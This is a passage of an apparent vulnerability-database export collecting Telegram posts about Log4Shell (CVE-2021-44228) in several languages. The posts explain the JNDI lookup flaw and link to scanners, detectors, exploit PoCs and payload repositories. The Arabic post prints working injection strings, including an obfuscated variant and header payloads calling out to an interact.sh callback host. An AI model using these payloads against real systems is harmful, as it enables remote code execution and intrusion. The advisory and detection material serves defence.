\u0623\u062f\u0627\u0629 \u0627\u0644\u062a\u0633\u062c\u064a\u0644 Log4j \u0644\u0645\u0639\u0627\u0644\u062c\u0629 \u062b\u063a\u0631\u0629\u00a0CVE-2021-44228 \u062d\u064a\u062b \u062a\u0645 \u0625\u0644\u063a\u0627\u0621 \u0627\u062a\u0627\u062d\u0629 \u062c\u0627\u0646\u0628 \u0648\u0627\u062d\u062f \u0641\u0642\u0637 \u0645\u0646 \u0648\u0638\u0627\u0626\u0641 \u0627\u0633\u062a\u0631\u062c\u0627\u0639 \u0627\u0644\u0631\u0633\u0627\u0626\u0644 \u0641\u064a JNDI \u062b\u0645 \u062a\u0628\u064a\u0646 \u0623\u0646\u0647 \u0644\u0627 \u064a\u0632\u0627\u0644 \u0645\u0646 \u0627\u0644\u0645\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0625\u0635\u062f\u0627\u0631 2.15 \u0645\u0646 \u062e\u0644\u0627\u0644 \u062a\u0643\u0648\u064a\u0646\u0627\u062a \u0645\u0639\u064a\u0646\u0629 \u0648\u0644\u0643\u0646 \u062a\u0645 \u062d\u062c\u0628 \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0627\u0644\u0641\u0646\u064a\u0629 \u0627\u0644\u0625\u0636\u0627\u0641\u064a\u0629 \u0644\u0644\u062e\u0637\u0623 \u0644\u0645\u0646\u0639 \u0627\u0644\u0645\u0632\u064a\u062f \u0645\u0646 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\n_ \u0623\u0642\u0631\u062a \u0634\u0631\u0643\u0629 Apache \u0628\u0627\u0644\u062e\u0637\u0623 \u0645\u0631\u0629 \u0623\u062e\u0631\u0649 \u0648\u0644\u0630\u0644\u0643 \u0642\u0627\u0645\u062a \u0628\u062a\u0639\u0637\u064a\u0644 \u0643\u0627\u0641\u0629 \u062f\u0639\u0645 JNDI \u0628\u0634\u0643\u0644 \u0627\u0641\u062a\u0631\u0627\u0636\u064a \u0648\u0625\u0632\u0627\u0644\u0629 \u0645\u0639\u0627\u0644\u062c\u0629 \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0627\u0644\u0631\u0633\u0627\u0626\u0644 \u062a\u0645\u0627\u0645\u0627 \u0648\u0642\u0627\u0645\u062a \u0628\u0625\u0635\u062f\u0627\u0631 \u0627\u0644\u0625\u0635\u0644\u0627\u062d \u0627\u0644\u062b\u0627\u0646\u064a Log4j 2.16 \u0644\u0645\u0639\u0627\u0644\u062c\u0629 \u0627\u0644\u062e\u0637\u0623 \u0627\u0644\u0630\u064a \u062a\u0645 \u062a\u0639\u064a\u064a\u0646\u0647 \u0643\u0640 CVE-2021-45046 \n\n\u0643\u064a\u0641 \u062a\u0639\u0645\u0644 \u062b\u063a\u0631\u0629 Log4Shell ..\u061f\n\u0628\u062f\u0627\u064a\u0629\u064b \u0645\u0627 \u0647\u0648 Log4j \u0648 JNDI ..\u061f\nLog4j\n\u0645\u0643\u062a\u0628\u0629 Java \u0628\u0645\u062b\u0627\u0628\u0629 \u0623\u062f\u0627\u0629 \u0645\u0633\u0627\u0639\u062f\u0629 \u062a\u0633\u062a\u062e\u062f\u0645 \u0639\u0644\u0649 \u0646\u0637\u0627\u0642 \u0648\u0627\u0633\u0639 \u0641\u064a \u0628\u0631\u0627\u0645\u062c Java \u0644\u062a\u0633\u062c\u064a\u0644 \u0631\u0633\u0627\u0626\u0644 \u0627\u0644\u062e\u0637\u0623 \u0641\u064a \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0648\u062a\u0633\u062a\u062e\u062f\u0645 \u0623\u064a\u0636\u0627 \u0641\u064a \u062e\u062f\u0645\u0627\u062a cloud computing\n\nJNDI\n\u0648\u0627\u062c\u0647\u0629 \u0628\u0631\u0645\u062c\u0629 \u062a\u0637\u0628\u064a\u0642\u0627\u062a Java APIs \u062a\u0633\u062a\u062e\u062f\u0645\u0647\u0627 Log4j \u0644\u0627\u0633\u062a\u0631\u062f\u0627\u062f \u0627\u0644\u0639\u0646\u0627\u0635\u0631 \u0648\u0627\u0644\u0643\u0627\u0626\u0646\u0627\u062a \u0645\u0646 \u0648\u062d\u062f\u0627\u062a \u0627\u0644\u062e\u062f\u0645\u0629 \u0627\u0644\u0628\u0639\u064a\u062f\u0629 \u0648\u064a\u0645\u0643\u0646 \u0644\u0647 \u0627\u0644\u0627\u0633\u062a\u0641\u0627\u062f\u0629 \u0645\u0646 \u0645\u0646 \u0627\u0644\u0639\u062f\u064a\u062f \u0645\u0646 \u0648\u0627\u062c\u0647\u0627\u062a \u0627\u0644\u062f\u0644\u064a\u0644 \u0628\u0645\u0627 \u0641\u064a \u0630\u0644\u0643 \u0648\u0627\u062c\u0647\u0629\u00a0\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u0627\u0644\u0648\u0635\u0648\u0644 \u0627\u0644\u062e\u0641\u064a\u0641 \u0625\u0644\u0649 \u0627\u0644\u062f\u0644\u064a\u0644\u00a0LDAP \u0648\u0646\u0638\u0627\u0645 \u0627\u0633\u0645\u0627\u0621 \u0627\u0644\u0645\u062c\u0627\u0644\u00a0(DNS) \u0648\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 (IIOP) \n\n\u0633\u0628\u0628 \u0627\u0644\u062e\u0644\u0644\n\u0639\u0646\u062f \u062a\u0634\u063a\u064a\u0644 \u0645\u064a\u0632\u0629 \u0627\u0633\u062a\u0628\u062f\u0627\u0644 \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0627\u0644\u0631\u0633\u0627\u0626\u0644\u00a0\u0633\u062a\u0643\u062a\u0634\u0641 Log4j \u0627\u0644\u0633\u0644\u0627\u0633\u0644 \u0627\u0644\u062a\u064a \u062a\u0634\u064a\u0631 \u0625\u0644\u0649 \u0645\u0648\u0627\u0631\u062f JNDI \u0641\u064a \u0645\u0635\u0627\u062f\u0631 \u0627\u0644\u062a\u0643\u0648\u064a\u0646 \u0648\u0631\u0633\u0627\u0626\u0644 \u0627\u0644\u0633\u062c\u0644 \u0648\u0627\u0644\u0645\u0639\u0627\u0645\u0644\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0645 \u062a\u0645\u0631\u064a\u0631\u0647\u0627 \u0628\u0648\u0627\u0633\u0637\u0629 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a\u060c \u0648\u0646\u0638\u0631\u0627 \u0644\u0623\u0646 Log4j \u0644\u0627 \u064a\u0642\u0648\u0645 \u0628\u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0639\u0646\u0627\u0648\u064a\u0646 url \u0627\u0644\u062a\u064a \u062a\u0645 \u0625\u0631\u0633\u0627\u0644\u0647\u0627 \u0641\u064a \u0647\u0630\u0647 \u0627\u0644\u0633\u0644\u0627\u0633\u0644 \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0646\u0634\u0627\u0621 \u0637\u0644\u0628\u0627\u062a \u0636\u0627\u0631\u0629 \u0644\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0633\u062a\u062e\u062f\u0645 Log4j \u0628\u0627\u0633\u062a\u0628\u062f\u0627\u0644 \u0627\u0644\u0631\u0633\u0627\u0626\u0644 \u0641\u064a \u0627\u0644\u062d\u0642\u0648\u0644 \u0627\u0644\u062a\u064a \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0639\u0646\u0627\u0648\u064a\u0646 url \u0628\u062e\u0648\u0627\u062f\u0645 \u0636\u0627\u0631\u0629\n\u0639\u0644\u0649 \u0633\u0628\u064a\u0644 \u0627\u0644\u0645\u062b\u0627\u0644 \u0641\u064a \u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0648\u064a\u0628 \u0646\u0638\u0631\u0627 \u0644\u0623\u0646\u0647 \u064a\u062a\u0645 \u062a\u0633\u062c\u064a\u0644 \u0637\u0644\u0628\u0627\u062a\u00a0HTTP\u00a0\u0628\u0634\u0643\u0644 \u0645\u062a\u0643\u0631\u0631 \u0641\u0625\u0646 \u0645\u062a\u062c\u0647 \u0627\u0644\u0647\u062c\u0648\u0645 \u0627\u0644\u0634\u0627\u0626\u0639 \u0647\u0648 \u0648\u0636\u0639 \u0627\u0644\u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u0636\u0627\u0631\u0629 \u0641\u064a\u00a0\u0639\u0646\u0648\u0627\u0646 url \u0644\u0637\u0644\u0628 HTTP \u0623\u0648\u00a0\u0631\u0623\u0633 HTTP\u00a0\u064a\u062a\u0645 \u062a\u0633\u062c\u064a\u0644\u0647 \u0628\u0634\u0643\u0644 \u0645\u062a\u0643\u0631\u0631\n\u0645\u062b\u0644: \n\u00a0${jndi:[protocol]://[remote server and code address]}\n\u064a\u062a\u0645 \u0639\u0631\u0636 \u0639\u0646\u0648\u0627\u0646 url \u0627\u0644\u0630\u064a \u0642\u0627\u0645 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u062a\u0639\u064a\u064a\u0646\u0647 \u0643\u0628\u064a\u0627\u0646\u0627\u062a \u0639\u0646\u0635\u0631 Java \u0648\u0628\u0639\u062f\u0647\u0627 \u064a\u062a\u0645 \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0645\u0646 \u0647\u0630\u0627 \u0627\u0644\u0639\u0646\u0648\u0627\u0646 \u0625\u0630\u0627 \u0643\u0627\u0646 \u0645\u062a\u0635\u0644\u0627 \u0628\u0627\u0644\u0625\u0646\u062a\u0631\u0646\u062a \u0648\u0628\u0625\u062f\u062e\u0627\u0644 \u0633\u0644\u0633\u0644\u0629 \u064a\u062a\u0645 \u062a\u0633\u062c\u064a\u0644\u0647\u0627 \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u062a\u062d\u0645\u064a\u0644 \u0648\u062a\u0646\u0641\u064a\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0636\u0627\u0631\u0629 \u0645\u0633\u062a\u0636\u0627\u0641\u0629 \u0639\u0644\u0649 \u0639\u0646\u0648\u0627\u0646 url \u0639\u0627\u0645 \u064a\u062a\u0645 \u062a\u0646\u0641\u064a\u0630\u0647\u0627 \u062a\u0644\u0642\u0627\u0626\u064a\u0627 \u0641\u064a \u0627\u0644\u0630\u0627\u0643\u0631\u0629\n\u064a\u0648\u062c\u062f \u0645\u062c\u0645\u0648\u0639\u0629 \u0645\u062a\u0646\u0648\u0639\u0629 \u0645\u0646 \u0623\u0634\u0643\u0627\u0644 \u0627\u0644\u062a\u0639\u062a\u064a\u0645 \u062a\u064f\u0633\u062a\u062e\u062f\u0645 \u0644\u0645\u0646\u0639 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u0641\u062d\u0635 \u0623\u0648 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0645\u062b\u0644:\n($ {$ {:: - j} $ {:: - n} $ {:: - d} $ {:: - I})\u00a0\n\u0628\u0639\u0636 \u0631\u0624\u0648\u0633 HTTP \u0627\u0644\u062a\u064a \u0644\u0627\u062d\u0638\u0647\u0627 \u0627\u0644\u0628\u0627\u062d\u062b\u0648\u0646 \u0641\u064a \u0637\u0644\u0628 GET\u00a0\nreferer=${jndi:ldap://[redacted].interact.sh}\nx-http-host-override=${jndi:ldap://[redacted].interact.sh}\ntrue-client-ip=${jndi:ldap://[redacted].interact.sh}\nx-forwarded-port=443, x-client-ip=${jndi:ldap://[redacted].interact.sh}\ncf-connecting_ip=${jndi:ldap://[redacted].interact.sh}\nx-forwarded-host=${jndi:ldap://[redacted].interact.sh}\ncontact=${jndi:ldap://[redacted].interact.sh} \n\n\u0644\u0627\u062d\u0638 \u0627\u0644\u0628\u0627\u062d\u062b\u0648\u0646 \u0623\u064a\u0636\u0627 \u062a\u062d\u0648\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0625\u0644\u0649 \u0648\u0627\u062c\u0647\u0629 \u0628\u0631\u0645\u062c\u0629 \u062a\u0637\u0628\u064a\u0642\u0627\u062a RMI \u0628\u062f\u0644\u0627 \u0645\u0646 \u0648\u0627\u062c\u0647\u0629 \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 LDAP \n\nLog4j 2.16.0 _ CVE-2021-45046 \nhttps://logging.apache.org/log4j/2.x/security.html\n\n\u0644\u0641\u062d\u0635 \u062b\u063a\u0631\u0627\u062a Log4Shell \u0648\u0625\u0635\u0644\u0627\u062d\u0647\u0627 \u0628\u0645\u0627 \u0641\u064a \u0630\u0644\u0643 log4j 2.15.0 \u0627\u0644\u0645\u0635\u0646\u0641\u0629 CVE-2021-45046\nhttps://github.com/logpresso/CVE-2021-44228-Scanner\n\nFind vulnerable Log4j2 versions on disk and also inside Java Archive Files\nhttps://github.com/fox-it/log4j-finder", "creation_timestamp": "2021-12-17T00:07:48.000000Z"}, {"uuid": "675e9328-ecd5-4e32-9a05-2173d5f44ec6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/hacker_trick/623", "content": "Log4Shell Payloads\nhttps://github.com/rwincey/CVE-2021-44228-Log4j-Payloads\n\nRDP server access to C: drive\nhttps://github.com/klinix5/ReverseRDP_RCE", "creation_timestamp": "2022-01-13T15:02:13.000000Z"}, {"uuid": "0f32d5f0-d488-4b7c-9ffd-dddaf7ba383d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/566", "content": "Log4Shell RCE Exploit fully independent exploit does not require any 3rd party binaries\nhttps://github.com/cyberstruggle/L4sh\n\nLog4j Scanner coded in Powershell\nhttps://github.com/Maelstromage/Log4jSherlock\n\nopen detection and scanning tool for discovering and fuzzing for Log4J RCE\nhttps://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit\n\nCVE-2021-22005 vulnerability which exists in the analysis service of vCenter Server\nhttps://github.com/shmilylty/cve-2021-22005-exp\n\nWindows Common Log File System Driver poc\nhttps://github.com/KaLendsi/CVE-2021-43224-POC", "creation_timestamp": "2021-12-28T17:49:54.000000Z"}, {"uuid": "6602e565-c792-4959-a905-2cff05421bc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/hacker_trick/547", "content": "#CVE-2021-44228 #Log4Shell #RCE\nLog4j2 RCE Passive Scanner\nplugin for BurpSuite\nhttps://github.com/whwlsfb/Log4j2Scan\n\nNmap NSE scripts to check against log4shell\nhttps://github.com/Diverto/nse-log4shell\n\nThe source IP uses Apache Log4j \nRCE to try to attack\nhttps://github.com/RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs", "creation_timestamp": "2021-12-17T11:45:53.000000Z"}, {"uuid": "697929f6-225e-4512-8986-b4398658b9be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/hacker_trick/541", "content": "#CVE-2021-44228 #Log4Shell #RCE\nRemote code injection in Log4j\nAffected versions: Any #Log4j version prior to v2.15.0 is affected to this specific issue\n\npoc\nhttps://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce\n\n#Log4j impact on manufacturers and components summary from the Internet community\nhttps://github.com/YfryTchsGD/Log4jAttackSurface\n\n#LOG4J Java exploit - A trick to bypass words blocking patches\nhttps://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words\n\nvaccinate a victim server against Log4Shell\nhttps://github.com/Cybereason/Logout4Shell\n\nDetector for Log4Shell exploitation attempts\nhttps://github.com/Neo23x0/log4shell-detector\n\nSpring Boot web application vulnerable to #Log4j\nhttps://github.com/christophetd/log4shell-vulnerable-app\n\nVulnerability scanner for #Log4j2\nhttps://github.com/logpresso/CVE-2021-44228-Scanner\n\nSimple Python 3 script to detect the #Log4j Java library vulnerability\u00a0for a list of URL with multithreading\nhttps://github.com/takito1812/log4j-detect", "creation_timestamp": "2021-12-14T11:16:50.000000Z"}, {"uuid": "741fd49f-4ce5-41a0-887e-870d5ca453a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cyber_fu/157", "content": "\u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641 \u062b\u063a\u0631\u0629 \u062e\u0637\u064a\u0631\u0629 \u062a\u062d\u062a \u0627\u0633\u0645 Log4Shell \u0648 \u0633\u062c\u0644\u062a \u0628\u0627\u0644\u0631\u0642\u0645 ( CVE-2021-44228)  \n\n\u0645\u0646 \u0627\u0644\u0645\u062a\u0648\u0642\u0639 \u0641\u064a \u0627\u0644\u0627\u064a\u0627\u0645 \u0627\u0644\u0642\u0627\u062f\u0645\u0629 \u0623\u0646 \u062a\u062d\u0635\u0644 \u0643\u0648\u0627\u0631\u062b \u062a\u0642\u0646\u064a\u0629 \u0648\u062e\u0633\u0627\u0626\u0631 \u0643\u0628\u064a\u0631\u0629 \u0646\u062a\u064a\u062c\u0629 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629. \n\n\u0644\u0645\u0632\u064a\u062f \u0645\u0646 \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644:\nhttps://www.kaspersky.com/blog/log4shell-critical-vulnerability-in-apache-log4j/43124/\n\nhttps://www.lunasec.io/docs/blog/log4j-zero-day/", "creation_timestamp": "2021-12-12T12:15:16.000000Z"}, {"uuid": "9e182ca2-ee98-4671-9719-fb8bb3a9ea7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/I5GaP9KeTDKIoH4RB-nV0oz7rJX0vrZPl68eWX2InNzmuQ", "content": "", "creation_timestamp": "2021-12-12T01:47:11.000000Z"}, {"uuid": "eeb274d3-3bc3-4eda-965b-8857c8270fe3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/CyberSecurityIL/8227", "content": "\u05d4\u05e1\u05d5\u05db\u05e0\u05d5\u05ea \u05dc\u05d4\u05d2\u05e0\u05ea \u05e1\u05d9\u05d9\u05d1\u05e8 \u05d5\u05ea\u05e9\u05ea\u05d9\u05d5\u05ea \u05d1\u05d0\u05e8\u05d4\"\u05d1 (CISA) \u05de\u05e4\u05e8\u05e1\u05de\u05ea \u05db\u05dc\u05d9 \u05dc\u05e1\u05e8\u05d9\u05e7\u05ea \u05e9\u05e8\u05ea\u05d9\u05dd \u05d4\u05e4\u05d2\u05d9\u05e2\u05d9\u05dd \u05dc\u05d7\u05d5\u05dc\u05e9\u05d5\u05ea \u05e9\u05d6\u05d5\u05d4\u05d5 \u05d1\u05e1\u05e4\u05e8\u05d9\u05d9\u05ea Log4j.\n\n\u05d4\u05db\u05dc\u05d9 \u05e9\u05e4\u05d5\u05e8\u05e1\u05dd \u05d9\u05d9\u05d3\u05e2 \u05dc\u05d6\u05d4\u05d5\u05ea \u05e9\u05e8\u05ea\u05d9\u05dd \u05d4\u05d7\u05e9\u05d5\u05e4\u05d9\u05dd \u05dc\u05e4\u05d2\u05d9\u05e2\u05d5\u05d9\u05d5\u05ea CVE-2021-44228 \u05d5-CVE-2021-45046 \u05d4\u05e7\u05d9\u05d9\u05de\u05d9\u05dd \u05d1\u05e1\u05e4\u05e8\u05d9\u05d9\u05ea Log4j. \n\u05dc\u05db\u05dc\u05d9 \u05e9\u05e4\u05d5\u05e8\u05e1\u05dd \u05d9\u05e9 \u05de\u05e1\u05e4\u05e8 \u05d9\u05db\u05d5\u05dc\u05d5\u05ea \u05db\u05d2\u05d5\u05df: \n\n- \u05e1\u05e8\u05d9\u05e7\u05d4 \u05dc\u05e4\u05d9 URL\n- \u05e1\u05e8\u05d9\u05e7\u05d4 \u05e9\u05dc \u05dc\u05de\u05e2\u05dc\u05d4 \u05de-60 Headr-\u05d9\u05dd \u05e9\u05d5\u05e0\u05d9\u05dd \u05d1\u05d4\u05dd \u05e0\u05d9\u05ea\u05df \u05dc\u05e9\u05ea\u05d5\u05dc \u05e1\u05e7\u05e8\u05d9\u05e4\u05d8 \u05d6\u05d3\u05d5\u05e0\u05d9. \n- \u05d6\u05d9\u05d4\u05d5\u05d9 \u05e9\u05dc \u05ea\u05e2\u05d1\u05d5\u05e8\u05d4 \u05d7\u05e9\u05d5\u05d3\u05d4 \u05e2\u05dc \u05d2\u05d1\u05d9 \u05e4\u05e8\u05d5\u05d8\u05d5\u05e7\u05d5\u05dc dns \u05d5\u05e2\u05d5\u05d3.\n\n\u05d0\u05dd \u05e2\u05d3 \u05e2\u05db\u05e9\u05d9\u05d5 \u05d7\u05dc\u05e7\u05db\u05dd \u05d4\u05e2\u05d3\u05e4\u05ea\u05dd \u05dc\u05d0 \u05dc\u05e2\u05e9\u05d5\u05ea \u05e9\u05d9\u05de\u05d5\u05e9 \u05d1\u05db\u05dc\u05d9\u05dd \u05d3\u05d5\u05de\u05d9\u05dd \u05d4\u05de\u05ea\u05e4\u05e8\u05e1\u05de\u05d9\u05dd \u05e2\"\u05d9 \u05d9\u05d7\u05d9\u05d3\u05d9\u05dd \u05d5\u05d7\u05d1\u05e8\u05d5\u05ea \u05e4\u05e8\u05d8\u05d9\u05d5\u05ea, \u05db\u05e2\u05ea \u05e0\u05d9\u05ea\u05df \u05dc\u05d4\u05d5\u05e8\u05d9\u05d3 \u05d0\u05ea \u05d4\u05db\u05dc\u05d9 \u05e9\u05de\u05e4\u05d5\u05e8\u05e1\u05dd \u05e2\"\u05d9 CISA \u05db\u05e7\u05d5\u05d3 \u05e4\u05ea\u05d5\u05d7 \u05de\u05de\u05e9 \u05db\u05d0\u05df \ud83d\udc47\ud83c\udffb \n\nhttps://github.com/cisagov/log4j-scanner\n\nhttps://t.me/joinchat/VRKwnb9-k8CSIizf", "creation_timestamp": "2021-12-22T17:11:25.000000Z"}, {"uuid": "4b4af564-c000-45ea-af6a-e3aedde36283", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/T_D-ibudk9jqCopr4ESxElyIKsoLxtJADtq48oIJEw4xlQ", "content": "", "creation_timestamp": "2021-12-18T18:36:14.000000Z"}, {"uuid": "a46382b5-fcd4-45f7-be09-fd4472e518d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/qnl2o8KmbIcA45BSfnBSJR6T3HKOpsC8NU0bbhBJQpu9rQ", "content": "", "creation_timestamp": "2021-12-13T16:10:03.000000Z"}, {"uuid": "beab0744-3036-4104-95eb-a6b646a9a818", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/Mcqff1ZshSApJ4E1DNZ2GEHNOon8SEYMSfdhg0za4gRGiQ", "content": "", "creation_timestamp": "2021-12-13T16:07:19.000000Z"}, {"uuid": "60716fd0-bfab-451c-9b82-7583f4c67f19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/crackcodes/1915", "content": "#Analytics\nTop 10 most exploited vulnerabilities in 2022\n\n1. CVE-2022-30190: MS Office \"Follina\"\n\n2. CVE-2021-44228: Apache Log4Shell\n\n3. CVE-2022-22965: Spring4Shell\n\n4. CVE-2022-1388: F5 BIG-IP\n\n5. CVE-2022-0609: Google Chrome zero-day\nhttps://blog.google/threat-analysis-group/countering-threats-north-korea\n6. CVE-2017-11882: Old but not forgotten - MS Office bug\n\n7. CVE-2022-41082, CVE-2022-41040: ProxyNotShell\n\n8. CVE-2022-27925, CVE-2022-41352: Zimbra Collaboration Suite bugs\n\n\n9. CVE-2022-26134: Atlassian Confluence RCE flaw  \n\n10. CVE-2022-30525: Zyxel RCE vulnerability", "creation_timestamp": "2022-12-21T16:27:48.000000Z"}, {"uuid": "b9e59623-cc73-4001-b01d-67dd01b05ca6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/RalfHackerChannel/1272", "content": "\u0415\u0441\u043b\u0438 \u043d\u0443\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 POC \u0434\u043b\u044f \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0439 CVE:\n\n1. \u041f\u0440\u043e\u0441\u0442\u043e \u0441\u043f\u0438\u0441\u043e\u043a CVE \u0438 \u0441\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 POC'\u0438 \u043a \u043d\u0438\u043c\n2. \u0415\u0449\u0451 \u0435\u0441\u0442\u044c \u0442\u0430\u043a\u043e\u0439 \u043c\u0435\u0442\u043e\u0434: \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0435 cve_id \u043d\u0443\u0436\u043d\u0443\u044e \u0432\u0430\u043c CVE (\u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u043d\u0430 \u0441\u043a\u0440\u0438\u043d\u0430\u0445)\n\ncurl 'https://poc-in-github.motikan2010.net/api/v1/?cve_id=cve-2021-44228' | jq | grep html_url\n\n#exploit #pentest #redteam", "creation_timestamp": "2022-09-30T17:39:40.000000Z"}, {"uuid": "2cb71eaf-5110-49f2-9882-8f0179ac0ead", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/true_secator/6567", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 F.A.C.C.T. \u0432 \u043d\u043e\u0432\u043e\u043c \u043e\u0442\u0447\u0435\u0442\u0435 \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0441\u0442\u044c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0445 \u043a\u043e\u0434\u043e\u0432 \u0438\u00a0\u0431\u0438\u043b\u0434\u0435\u0440\u043e\u0432 ransomware (Babuk, Conti \u0438\u00a0LockBit 3 (Black) \u0432 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445 \u0442\u0435\u043a\u0443\u0449\u0435\u0439 \u0433\u0435\u043e\u043f\u043e\u043b\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0438 \u043f\u043e\u0440\u043e\u0434\u0438\u043b\u0430 \u0431\u043e\u043b\u044c\u0448\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0438\u0445 \u0433\u0440\u0443\u043f\u043f, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0430\u00a0\u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0435 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0438\u00a0\u0444\u0438\u0437\u043b\u0438\u0446.\n\n\u041d\u0430\u0440\u044f\u0434\u0443 \u0441\u00a0\u043f\u043e\u043b\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043c\u043e\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c\u0438 \u0445\u0430\u043a\u0442\u0438\u0432\u0438\u0441\u0442\u0430\u043c\u0438 \u0434\u0430\u043d\u043d\u043e\u0439 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0435\u0439 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0438\u00a0\u043e\u0431\u044b\u0447\u043d\u044b\u0435 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0438, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0438 